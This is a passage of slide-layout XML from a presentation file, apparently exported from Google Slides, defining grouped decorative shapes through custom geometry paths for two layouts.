          <p:spPr>
            <a:xfrm>
              <a:off x="8996935" y="112825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 name="Google Shape;1192;p46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7848585" y="0"/>
            <a:ext cx="1295404" cy="3623066"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="1295404" cy="3623066"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1193" name="Google Shape;1193;p46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-7" y="0"/>
              <a:ext cx="643914" cy="3623066"/>
              <a:chOff x="-7" y="0"/>
              <a:chExt cx="643914" cy="3623066"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1194" name="Google Shape;1194;p46"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="201918" y="63821"/>
                <a:ext cx="72619" cy="101243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4011" h="5592" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="3663" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3555" y="1"/>
                      <a:pt x="3449" y="56"/>
                      <a:pt x="3384" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="76" y="5090"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="5241"/>
                      <a:pt x="26" y="5441"/>
                      <a:pt x="176" y="5542"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="5567"/>
                      <a:pt x="276" y="5592"/>
                      <a:pt x="351" y="5592"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="452" y="5592"/>
                      <a:pt x="552" y="5542"/>
                      <a:pt x="602" y="5441"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3910" y="504"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4011" y="354"/>
                      <a:pt x="3960" y="153"/>
                      <a:pt x="3835" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3782" y="17"/>
                      <a:pt x="3722" y="1"/>
                      <a:pt x="3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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="63976" y="15434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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="111628" y="3180578"/>
                <a:ext cx="60362" cy="108177"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3334" h="5975" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2984" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2870" y="1"/>
                      <a:pt x="2759" y="57"/>
                      <a:pt x="2707" y="160"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="75" y="5524"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5674"/>
                      <a:pt x="75" y="5850"/>
                      <a:pt x="226" y="5925"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="276" y="5950"/>
                      <a:pt x="326" y="5975"/>
                      <a:pt x="351" y="5975"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="476" y="5975"/>
                      <a:pt x="577" y="5900"/>
                      <a:pt x="652" y="5800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3258" y="436"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="3333" y="286"/>
                      <a:pt x="3283" y="110"/>
                      <a:pt x="3133" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3086" y="12"/>
                      <a:pt x="3035" y="1"/>
                      <a:pt x="29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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="370258" y="4858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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="88472" y="25155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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="376818" y="3564044"/>
                <a:ext cx="59004" cy="59022"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3259" h="3260" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1629" y="627"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2180" y="627"/>
                      <a:pt x="2632" y="1079"/>
                      <a:pt x="2632" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2632" y="2181"/>
                      <a:pt x="2180" y="2632"/>
                      <a:pt x="1629" y="2632"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1078" y="2632"/>
                      <a:pt x="627" y="2181"/>
                      <a:pt x="627" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="627" y="1079"/>
                      <a:pt x="1078" y="627"/>
                      <a:pt x="1629" y="627"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1629" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="727" y="1"/>
                      <a:pt x="0" y="728"/>
                      <a:pt x="0" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2532"/>
                      <a:pt x="727" y="3259"/>
                      <a:pt x="1629" y="3259"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2531" y="3259"/>
                      <a:pt x="3258" y="2532"/>
                      <a:pt x="3258" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3258" y="728"/>
                      <a:pt x="2531"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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="196921" y="2238919"/>
                <a:ext cx="22722" cy="22975"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1255" h="1269" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="625" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="461" y="0"/>
                      <a:pt x="295" y="72"/>
                      <a:pt x="176" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="216"/>
                      <a:pt x="126" y="241"/>
                      <a:pt x="101" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="317"/>
                      <a:pt x="51" y="342"/>
                      <a:pt x="51" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="417"/>
                      <a:pt x="26" y="467"/>
                      <a:pt x="1" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="542"/>
                      <a:pt x="1" y="592"/>
                      <a:pt x="1" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="793"/>
                      <a:pt x="51" y="943"/>
                      <a:pt x="176" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="1194"/>
                      <a:pt x="452" y="1269"/>
                      <a:pt x="627" y="1269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="778" y="1269"/>
                      <a:pt x="953" y="1194"/>
                      <a:pt x="1054" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="943"/>
                      <a:pt x="1254" y="793"/>
                      <a:pt x="1254" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1254" y="592"/>
                      <a:pt x="1254" y="542"/>
                      <a:pt x="1229" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="467"/>
                      <a:pt x="1204" y="417"/>
                      <a:pt x="1204" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="342"/>
                      <a:pt x="1154" y="317"/>
                      <a:pt x="1154" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1129" y="241"/>
                      <a:pt x="1104" y="216"/>
                      <a:pt x="1054" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="166"/>
                      <a:pt x="1003" y="141"/>
                      <a:pt x="978" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="91"/>
                      <a:pt x="903" y="66"/>
                      <a:pt x="853" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="828" y="41"/>
                      <a:pt x="778" y="16"/>
                      <a:pt x="753" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="711" y="5"/>
                      <a:pt x="668" y="0"/>
                      <a:pt x="6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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="603052" y="0"/>
                <a:ext cx="22704" cy="22595"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1254" h="1248" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="614" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="0"/>
                      <a:pt x="288" y="57"/>
                      <a:pt x="176" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="194"/>
                      <a:pt x="125" y="219"/>
                      <a:pt x="100" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="295"/>
                      <a:pt x="50" y="320"/>
                      <a:pt x="50" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="395"/>
                      <a:pt x="0" y="445"/>
                      <a:pt x="0" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="520"/>
                      <a:pt x="0" y="570"/>
                      <a:pt x="0" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="771"/>
                      <a:pt x="50" y="946"/>
                      <a:pt x="176" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="1172"/>
                      <a:pt x="451" y="1247"/>
                      <a:pt x="627" y="1247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="777" y="1247"/>
                      <a:pt x="952" y="1172"/>
                      <a:pt x="1053" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="946"/>
                      <a:pt x="1253" y="771"/>
                      <a:pt x="1253" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1253" y="570"/>
                      <a:pt x="1228" y="520"/>
                      <a:pt x="1228" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1228" y="445"/>
                      <a:pt x="1203" y="395"/>
                      <a:pt x="1203" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="320"/>
                      <a:pt x="1153" y="295"/>
                      <a:pt x="1128" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1103" y="219"/>
                      <a:pt x="1078" y="194"/>
                      <a:pt x="1053" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="57"/>
                      <a:pt x="777"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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-7" y="1029179"/>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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="341846" y="9701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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="584884" y="20180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6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="507951" y="28901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6" name="Google Shape;1206;p46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="853926" y="2268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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1272693" y="165079"/>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46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="294125" y="111775"/>
            <a:ext cx="425883" cy="216100"/>
            <a:chOff x="259675" y="4807625"/>
            <a:chExt cx="425883" cy="216100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1209" name="Google Shape;1209;p46"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="538673" y="4807625"/>
              <a:ext cx="146885" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3510" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="399195" y="4807625"/>
              <a:ext cx="145797" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3484" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2105" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="259675" y="4807625"/>
              <a:ext cx="145839" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3485" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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3">
  <p:cSld name="CUSTOM_32">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1212"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226400" y="657150"/>
            <a:ext cx="6691200" cy="38292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4" name="Google Shape;1214;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8559523" y="1128258"/>
            <a:ext cx="584466" cy="3281784"/>
            <a:chOff x="8559523" y="1128258"/>
            <a:chExt cx="584466" cy="3281784"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1215" name="Google Shape;1215;p47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9016004" y="2994926"/>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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8736973" y="19643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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9121267" y="3702904"/>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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8578586" y="13822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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8996935" y="112825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4" name="Google Shape;1224;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="0"/>
            <a:ext cx="1295404" cy="3623066"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="1295404" cy="3623066"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1225" name="Google Shape;1225;p47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-7" y="0"/>
              <a:ext cx="643914" cy="3623066"/>
              <a:chOff x="-7" y="0"/>
              <a:chExt cx="643914" cy="3623066"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1226" name="Google Shape;1226;p47"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="201918" y="63821"/>
                <a:ext cx="72619" cy="101243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4011" h="5592" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="3663" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3555" y="1"/>
                      <a:pt x="3449" y="56"/>
                      <a:pt x="3384" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="76" y="5090"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="5241"/>
                      <a:pt x="26" y="5441"/>
                      <a:pt x="176" y="5542"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="5567"/>
                      <a:pt x="276" y="5592"/>
                      <a:pt x="351" y="5592"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="452" y="5592"/>
                      <a:pt x="552" y="5542"/>
                      <a:pt x="602" y="5441"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3910" y="504"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4011" y="354"/>
                      <a:pt x="3960" y="153"/>
                      <a:pt x="3835" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3782" y="17"/>
                      <a:pt x="3722" y="1"/>
                      <a:pt x="3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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="63976" y="15434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7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="111628" y="3180578"/>
                <a:ext cx="60362" cy="108177"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3334" h="5975" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2984" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2870" y="1"/>
                      <a:pt x="2759" y="57"/>
                      <a:pt x="2707" y="160"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="75" y="5524"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5674"/>
                      <a:pt x="75" y="5850"/>
                      <a:pt x="226" y="5925"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="276" y="5950"/>
                      <a:pt x="326" y="5975"/>
                      <a:pt x="351" y="5975"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="476" y="5975"/>
                      <a:pt x="577" y="5900"/>
                      <a:pt x="652" y="5800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3258" y="436"/>
                    </a:lnTo>
